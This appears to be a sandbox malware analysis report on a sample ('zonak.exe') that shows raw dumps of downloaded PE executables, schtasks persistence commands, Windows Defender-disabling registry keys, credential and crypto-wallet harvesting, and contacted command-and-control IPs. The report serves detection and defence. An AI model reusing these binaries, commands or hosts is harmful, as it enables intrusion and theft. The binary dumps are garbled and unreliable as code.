2H5ªÒ¾2ÙþîüýÔD=Ã,ðcKÅêÓÃÄÈ×¡¥Æ²ZfÌ°ïÞàC[ûüYèÐ½u;±³`ÒR3¨{e¢vÇV=GÚ ^ßK7áR¾³¢@w;¦J¸ºã»%á£zsñe¥È¨qÊÖsðî!ü+õµP×ÿ\|qhØoµµ°'i´~¹t¸RûÒ9;<æÂÞ!9ÉW4HÇó R2^BZ@OêqNÌÎlÞè}?tSsr¨ÖLÁÕIßu¡Í·ùñ=ç3YU9Ê.ê¨UðÕñúá+`å1g¹¼6¤U©lºÛda7 Í(ZÖ4_$,%¤ÛíspÇ[û¯Ä¤²âÈÕ`%X±\|áé5èc_o·uïTÔØ#0øEóò°=ú1`?NKÌÈaëqA request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 20, 2024, 6:10 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PEL7geà"ÈT´à@P@Äà(¸ 4©¨¢8è¡@à.textèÆÈ `.rdata·à¸Ì@@.dataà6 @À.rsrc(¸àº¤@@.reloc4© ª^@BjPèi° S£ÌªUÇÜªU@ÇàªUOhÊRÀ S@Ð S@ à S@0Æ@@è ÄÃÌÌÌhpÊRèr YÃÌÌÌÌjhÐUèWhÊRèV ÄÃÌÌÌÌÌÌhÊRèB YÃÌÌÌÌhðÊRè2 YÃÌÌÌÌUìd¡jÿh@RPd%j¹ÐUÇEüè59hÐËRè÷MôÄd å]ÃÌÌÌÌÌÌÌÌÌÌUìd¡jÿh@RPd%j¹`ÐUÇEüèå8h°ËRè§MôÄd å]ÃÌÌÌÌÌÌÌÌÌÌUìd¡jÿh@RPd%j¹ÐUÇEüè8hËRèWMôÄd å]ÃÌÌÌÌÌÌÌÌÌÌUìd¡jÿh@RPd%j¹àÐUÇEüèE8hpËRèMôÄd å]ÃÌÌÌÌÌÌÌÌÌÌUìd¡jÿh@RPd%j¹ÑUÇEüèõ7hPËRè·MôÄd å]ÃÌÌÌÌÌÌÌÌÌÌjhÐÑUèhðËRèÄÃÌÌÌÌÌÌUìjÿhíRd¡Pd%ì,WÀfÇEã¶¦ÆEåº3ÀfÖEæfÇEîH0Lã@øróWÀ£ÕUMãÆEæEÈÇEØQÇEÜAÀuùV+ÊEãQPMÈè£ÇEüUÈ}ÜWÀÀÐUCUÈÊÇÐÐUÇÔÐUqAÀuù+ÎQR¹ÀÐUèYMÜ^ùr(UÈAÂùrPüÁ#+ÂÀüøw%QRèÄhÀÌRèzMôÄd å]ÃèðÌÌÌÌÌÌÌÌ¡Ä(Tó~¼(T£4«Uf¡È(Th`ÌRfÖ,«Uf£8«Uè,YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌVWj@è§£Ô«UøÇä«U?¹Çè«U?¾Ð(Tó¥hÌRf¥¤Æ@?èÛÄ_^ÃÌÌÌÌÌÌÌÌÌj@èY)TÈÇl«U= \«UÇp«U?hÍR )TA0)TA ó~@)TfÖA0¡H)TA8 L)TA<ÆA=è^ÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìjÿhíRd¡Pd%ì,WÀÇEá²¸¼ºÆEå»3ÀfÖEæfÇEîH0Lá@øróWÀ£DÕUMáÆEæEÈÇEØQÇEÜAÀuùV+ÊEáQPMÈèrÇEüUÈ}ÜWÀhÐUCUÈÊÇxÐUÇ\|ÐUqAÀuù+ÎQR¹hÐUè(MÜ^ùr(UÈAÂùrPüÁ#+ÂÀüøw%QRèkÄh ÍRèIMôÄd å]ÃèçíÌÌÌÌÌÌÌ¡X)Tó~P)T£«Uf¡\)Tf£ «U ^)Th`ÏRfÖ«U¢"«UèòYÃÌÌÌÌj èy`)T£t«UÇ«UÇ«UhÏRÆ@è´ÄÃÌÌÌÌj è9t)T£4¬UÇD¬UÇH¬U )THh ÎRÆ@èkÄÃÌÌÌÌÌÌÌÌÌÌÌj èé)T£¬UÇ,¬UÇ0¬Uf )TfHh@ÎRÆ@èÄÃÌÌÌÌÌÌÌÌÌj è)T£¼«UÇÌ«UÇÐ«Uf ¬)TfH ®)THhàÍRÆ@èÀÄÃh ÐRè²YÃÌÌÌÌUìjÿh Rd¡Pd%ìT(`T3ÀE ÇEÀõÁÚÏ(PTE°ÇEÄûÞÂý(sTEÈ@H0L @ø.róWÀ£ÈÕUM ÆEÎEØÇEèQÇEìAÀuùV+ÊE QPMØè¸ÇEüUØ}ìWÀ ÑUCUØÊÇ0ÑUÇ4ÑUqAÀuù+ÎQR¹ ÑUèkMì^ùr(UØAÂùrPüÁ#+ÂÀüøw%QRè®ÄhÀÏRèMôÄd å]Ãè*ëÌÌÌÌÌÌÌÌÌÌhÐRèbYÃÌÌÌÌhàÐRèRYÃÌÌÌÌh@ÑRèBYÃÌÌÌÌjh¤ÏUè'hàÑRè&ÄÃÌÌÌÌÌÌhPÒRèYÃÌÌÌÌh°ÒRèYÃÌÌÌÌh ÓRèòYÃÌÌÌÌh°ÓRèâYÃÌÌÌÌUìjÿhãqRd¡Pd%ì(`T3ÉbÿÿÿfÇE²ã(@Trÿÿÿ(PTE(°TE(°TE¢(àzTE´fA0 bÿÿÿAùXrð èÕUWÀbÿÿÿÆEºEÜÇEìQÇEðAÀuùV+ÊbÿÿÿQPMÜè¾ÇEüUÜ}ðWÀPÑUCUÜÊÇ`ÑUÇdÑUqAÀuù+ÎQR¹PÑUètÆEüMðùr,UÜAÂùrPüÁ#+ÂÀüøQRè°Ä(`T3ÉØþÿÿÇEì(TèþÿÿÇEð(PTøþÿÿÆEÜ(TÿÿÿÇHÿÿÿÆÈÍ¸(@Tÿÿÿ(T(ÿÿÿ(PT8ÿÿÿ(kTLÿÿÿA0 ØþÿÿAùzrð 8ÕUWÀØþÿÿÆRÿÿÿEÄÇEÔQÇEØAÀuù+ÊØþÿÿQPMÄèWÆEüUÄ}ØWÀhÑUCUÄÊÇxÑUÇ\|ÑUqDAÀuù+ÎQR¹hÑUèÆEüMØùr,UÄAÂùrPüÁ#+ÂÀüø£QRèGÄ(`T3ÉbÿÿÿÇEÔ(àTrÿÿÿÇEØ(ÀTEÆEÄ( TEfÇE²ã(°T request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 20, 2024, 6:10 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PEL7geà"ÈTÈµQà@ÐQ@àGPì´àG¨¢8Ð°@àÀà@´@à@ ô@àÀàü@à° þ@à.rsrcÀP¶þ@àÐ/´ @à.datað àGî ´ @àk'©¾âYlOÝ§çJ>Sò¿Y¶,ÕcñÁ3I²E-ØÇ\ëøÞ3,Áqý~ÜDgW û¯Zi¾¯0ÃððG5aÇ¬¡·Ã4X}zêB.uHÂUßcÒÿÄ(Yc jXg³è¯à!²øIø»ØÕMá¦ µzÚêxê4&+F!%@ê5[c±ë§?ÃðËÌô¿¨ÕüMýä1s½ÛÄñÚÈü¹³óÄi±HÎ¸dýG¯Ô÷màLÏ§xkÐýKüy Ð,Ú²ý %G»Í\¶,%a¦d÷y"®¥ùFÂOO5² ,dgEÌßªßÄöúX_W¢½i-F³ÀÀ3cJ-ÿ¶i:<Tåïe¢Ñð²?0C6%f?t×¦ÎY MfÅ~â¸KpÑÁ¨<X·,a%O)ÑN·¶è±Àöª[pèÿNùåüö'ë:fhh`xóÊ¸ÒîÉß4rªg!I¤Ñ>l\|ÕñTL¡q^ËE\\¨)à³sZ ©'µ×V£0aE/ï_ dK¦\IJAó°4úëÊ´%3FBÉ4$pçöºÜ5û¾\|DÍ0]C¶4HÂm\áºYÓ&»BÎ¯nôÒ?ªäh°ÄkúXqè2òâ¥FÒR°÷à,/´dýÜöæ¤ßÔÉ([Þ§Ò/ÖK=¬«§Kpß_ïï@·@ï{q¤I7ÿ1%íüÆ-/àWeAóL®»Þ¤UpÖlt=RBT×+öcjJ(õ£(J³üwãiÞúóë÷_¸Ì3&ûó6ÃÙhçÌÖ¨U°¬euTÅhä¡ \ ØòÍÅF6;æ¬ Ý¯üôDîþ `Uá÷L½ÓçäÎªO$ù7?§qV£äøÊ5ã\|>÷Ç1Y«Rä\|<sÒ.¡¡.°0]?@9ÑtôÚ¬`ü!?Èñâ-ß?v:RÁtä+%÷Fß`É&5! &÷8-awR>ÛxK¼;×è¸S ÆU-£Qd=#~ñe?¿%sTÒö¹d®¿¥JçG¸ÃK&²d¤'ÉWa £xìëdZuÛêkXÞ±X_[h ðöø¦u»ÇIÕ$ [°¡-/xy´V-Â°¯dlLL¿deË s%»;¼¨¹w¯Ê%Ô5^;Ágk.Ô£&Ñ¥ám£±TEDU¤FèëOn÷8ÉÒOÑÂÚ05³iáðíå/^3oÎ]Î'T6ýC 1ÕN³:¤©¦L ¾¾ù1ÖPqsÓ²äõ½È+¤(Êû°¬1MRö¿DÀ ]¸Hñ!ØIÅè¤&Pçf¹d:àijYrºÀ_ø'ùkP§ÏW)^²¦\uÇýt÷_¶ :mÏ»~/¢ ÿ#lCéµ5»rPt¾M[êaU[ákØ£27÷Üh~Ö}CÛ#v«ìL/!í ª¦1aàî¦2°tß/J[èa²3L4À°\|üöë3õWÙwãÒÎ5¼B:Ú{ÚZnkUðì·ÂiHVuò\óÀî²¤V4N¿7g$æ4MâQ¶'þd4¶Ê nnP:Â;Z¸,®ÐcµDz]Hi'£>1»P¡F0Ì?=BÀa¢¶_ÿPß¤P%%$EøÅîâ#}³G¶!vð§Ù Ýbª²&d1éòrIÙUÚÇÝV .Öwr¿¥½öCÀðÍùxNm)%åt»bÑqU¥9ø.Îó+§¤n«²¿½ß¸ÌmªB@¹/Ë\|®oW<XHGãxF¹ñº-þ}ÞÉpAH¥$ ZöoèÉXÂn«+ÌÀ´4,¬}öhoµSrfLú2H3ëÂHöYèòá6 tR¡Rèõ4ê}ªsï2{¶ÖvÌq qîGá-Ss®é¿Ìj :VChíôÓÕptD\÷J²ñ¾6&9M1Å¿Èo ·À¹ññke>½Û^úi¶¹A8 ô·ö Î·ÒÎáágWe\b`PMâOCòÐÔ#ÝîtýÂVlÀ}l ^¿.[ÁTW?\|ñÇÁ¦(ÀÉ&£?ãp5A[ÊI«çãÝeíÈ(=amØ.B¬©C>B¾TmèRÉ\®\|ïw¤ (Ó#0P¹!ªÜ%)ÍÑ5°µ5¨xSþ¡UÂ7u1pºÚðoÐuãT¦¬HºÄµ¨\l9ß"í÷eHNã¤yý<F¶J@ B~Ub³ðQò ½=&TXá`½n [S^iFÂzN.Özß;ZérðßùO±:¥c#RNéûíÇ·ªMÁ=Üàÿê<É±/û¾¾ìòÚ¯ãG N],51:ó æÂªãu@ÇôoõFmõY{±OA-IåÄ¼vøåolP¢vÑëM{^¥TqV&róÕdáwkÌ «Î#%&93: kÉCæí±zkbÃnejç+t,DÃ°]^F¯ÔWtÁ[;/ºÐA¼ç×+akÂ°ÜKbAÀWX`yc¦2÷!#fýÕÛïÄöÈ1:.B{KT nCçð×í<Ú=hT~]àórjX](±Ê}kCç¨"<Òp1³Ù\|îÉ°£N$%§ÜXìS2FWn¶ÂFò¡RNRÉ_¾¶èu¶±:q5µQ^Þ¶ Îwëô%òæ6ñù"ÍYQ Ì¼v×é kõk];sC _'ÿ ¾ÚÕásc©N\|§Ç;;%·ÃcD6â¢·;5ðz FÏÔp'éº+O»Ý91õ«\| öd'ºäW$KÕ£3k ßõÃòHb^c#m!r/5$&¸¹¸E{hþW,FðÓCo5eyd°¥þBÎ.ý:PvMÜÇBC§J%6¸ØGyvÀCËZÜb#îsN°nãÊûÛf3ÑC§FÄïßk¶:VÔ·´ßórµVµ4Vò71Û:VUáëPS~·!ÃÎðhè»Éo«qlÎáMEq1cµñ¿©:ËO#1°0Îà-dÿÂuØPa"ßmY^Å40dg·;ñkqqÝÿH¶ê/Tx§?æé o§&7/F&â¥A8¸EÀú$¨WÛhúL£ÙÅ=¤ßëI ¹+U³µá±ä9Òîì¶Î\óxA.®TÐ{s¨ÁÐÂeZm'FEbHG&{Js©hlSü÷ÎÌu0$ëîl4Ç42±¬Uêãn\§öÆpÊq«GîNªqÍ¦Ã\|7"¬s¡Y;Pb¦m{4¸sÆëÿì ºÉ,;®ÂÈ¬DAhÊÑpRLå©ÄÏ !@Ïk¶S\Ñ>¼ÌtMSÑðM eC6u.w/=:ò¤+2¨£7¡jýzWqYfª¦Sdg²ï@ý7´]T²©Év²ê>Qæ#½Ö}°åÉì\|ýB¼Ï5r+ í%þlàòø¶Á©I×-(Vâ=ÅK,?Á)½ì VéD0Xg]nHPú³øBø{{µ>QåîJ@NâgÓ¾àq\ºØ9ÛU\¥2é8ÊÑ7ÛáQôRÓ¬¤í¡Z request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 20, 2024, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPELhÖeà!!g à@ z<{P°øÀ°o8èo@ H.textV `.rdata b d@@.datav@À.rsrcø°@@.relocÀ@Bj hèl¹pèßHhèSYÃÌÌÌj hm¹è¿Hh`èSYÃÌÌÌjh0m¹ èHhÀèmSYÃÌÌÌjhHm¹¸èHh èMSYÃÌÌÌjham¹Ðè_Hhè-SYÃÌÌÌjham¹èè?Hhàè SYÃÌÌÌjham¹èHh@èíRYÃÌÌÌjham¹èÿGh èÍRYÃÌÌÌhè¾RYÃÌÌÌÌh`è®RYÃÌÌÌÌhÀèRYÃÌÌÌÌj?hèm¹xè¯Gh è}RYÃÌÌÌhènRYÃÌÌÌÌh è^RYÃÌÌÌÌh@èNRYÃÌÌÌÌhàè>RYÃÌÌÌÌhè.RYÃÌÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèb[ÄÆ^]ÂÌÌÌI¸¼lÉEÁÃÌÌUìVñFÇÔ!Pè[ÄöEtjVèLNÄÆ^]ÂAÇÔ!Pèi[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhzEôPè;[ÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèZÄÇ,"Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèRZÄÇà!Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì}SVÙW]àÛ}0Ñ}HÇj/hdmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèEjjjjhmÿ,!}MjCMjjjjjPQPE´ÿ0!}4M jCM jjjjQhmPE¸ÿ4!}LU8ÿuHCU8MÈ}ÜðRÿuØCMÈQVuÀÿ8!EüPhÿûÿÿPVÿ<!Ài}ü\ûÿÿÇEÇEPÆEfD@Éuù+ÂMPûÿÿPè§DMüE9MÇE¬BM}QCEMPÇE°ÆEèvD}°U}MôC×Eø]¬+ÁMÄSR;Øw,}øuäCuäEôPè«jMÄ3uÀÄÆëÆE¼Mäÿu¼SèG}E°ør+HÇùrüÁ#+ÇÀüøQWèXKÄUúr,MBÁúrIüÂ#+ÁÀüødRQè$KÄEüÆûÿÿEüPhÿûÿÿPVÿ<!Àþÿÿ]àV5@!ÿÖÿu¸ÿÖÿu´ÿÖEäUÜ¸ÆEäó~EôfÖCÇEôEøúr/MÈBÁúrIüÂ#+ÁÀüøÌRQèJEøÄÇEØÇEÜÆEÈør.MäPÁúrIüÂ#+ÁÀüøRQèDJÄUÇEôÇEøÆEäúr,MBÁúrIüÂ#+ÁÀüø>RQèþIÄU4ÇEÇEÆEúr,M BÁúrIüÂ#+ÁÀüøøRQè¸IÄULÇE0ÇE4ÆE úÇM8BÁú«IüÂ#+ÁÀüøªéjhamÇCÇCÆèÝAUúr(MBÁúrIüÂ#+ÁÀüøwbRQè"IÄU4ÇEÇEÆEúLÿÿÿM BÁú0ÿÿÿIüÂ#+ÁÀüøwéÿÿÿRQèÓHÄ_^Ã[å]ÃèðnÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì<¹`SVW=@3öVham3ÛèAÿDCOãÿyKËÿÿÿCð¥¶ÑòæÿyNÎÿÿÿF¶ð¥ð¥ð¥Mà¶ð¥Âuø¶ÀjÇEðÇEô¶ð¥EÿEÿPÆEàè@Eàº`PMÈèÆAðÄþ`t\| tùr.¡`AùrPüÁ#+ÂÀüøÔÂQPèµGÄÇpÇtÆ``ó~FfÖpÇFÇFÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøw_RQèBGÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøwRQèGÄÿtuøéoþÿÿ_^[å]ÃèmÌÌÌUìì<SVWùÇGÇGÆèþÿÿ¡t¾``ø»0Cò=DC0+Þ]øø¹`¡pCÊÁ;ð*3Mà2EÿEÿjPÇEðÇEôÆEàèÞ>Eà×PMÈè@ØÄ;ûteOùr+AùrPüÁ#+ÂÀüøÍÂQPè FÄÇGÇGÆó~CfÖGÇCÇCÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøwiRQè§EÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøw'RQèeEÄ¡tF`]øé¼þÿÿÇ_^[å]ÃènkÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ}4E SCE VWÿu0Mü¹HPè=}EÿuCE¹0Pè=5X3Û=\fDÿð¥Ã¹HC H÷þ ð¤Cû\|Ô3ÿ3öð¥¶ð¤ø¶ÊùçÿyOÏÿÿÿGð¥ð¥Fð¥þ\|ÁuüÎèýÿÿUúr request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (5 events)

section

{u'size_of_data': u'0x0007b000', u'virtual_address': u'0x00001000', u'entropy': 7.999507502158802, u'name': u'', u'virtual_size': u'0x0012d000'}

entropy

7.99950750216

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00014000', u'virtual_address': u'0x0012e000', u'entropy': 7.995629353391032, u'name': u'', u'virtual_size': u'0x0002c000'}

entropy

7.99562935339

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00000800', u'virtual_address': u'0x0015a000', u'entropy': 7.2776079230069355, u'name': u'', u'virtual_size': u'0x00004000'}

entropy

7.27760792301

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0009ee00', u'virtual_address': u'0x0047e000', u'entropy': 7.938766629515002, u'name': u'.data', u'virtual_size': u'0x0009f000'}

entropy

7.93876662952

description

A section with a high entropy has been found

entropy

0.963361210673

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 20, 2024, 6:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2936 CREDAT:145409
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 LG" /sc ONLOGON /rl HIGHEST

Communicates with host for which no DNS query was performed (4 events)

host	109.107.182.3
host	117.18.232.200
host	185.215.113.68
host	193.233.132.62

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Jan. 20, 2024, 6:10 p.m.	service_handle: 0x007bc530 service_name: WinDefend control_code: 1		0	0
ControlService Jan. 20, 2024, 6:10 p.m.	service_handle: 0x007bc968 service_name: wuauserv control_code: 1		0	0

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (10 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\LegalHelper131	reg_value	C:\Users\test22\AppData\Local\LegalHelper131\LegalHelper131.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\livak.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000392001\livak.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\zonak.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000434001\zonak.exe
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (3 events)

process	zonak.exe	useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe	useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
process	explorhe.exe	useragent

Appends a known CryptoMix ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2936 resumed a thread in remote process 3068
NtResumeThread Jan. 20, 2024, 6:10 p.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 3068	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\IEUpdater131\IEUpdater131.exe" /tn "IEUpdater131 LG" /sc ONLOGON /rl HIGHEST

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

zonak.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All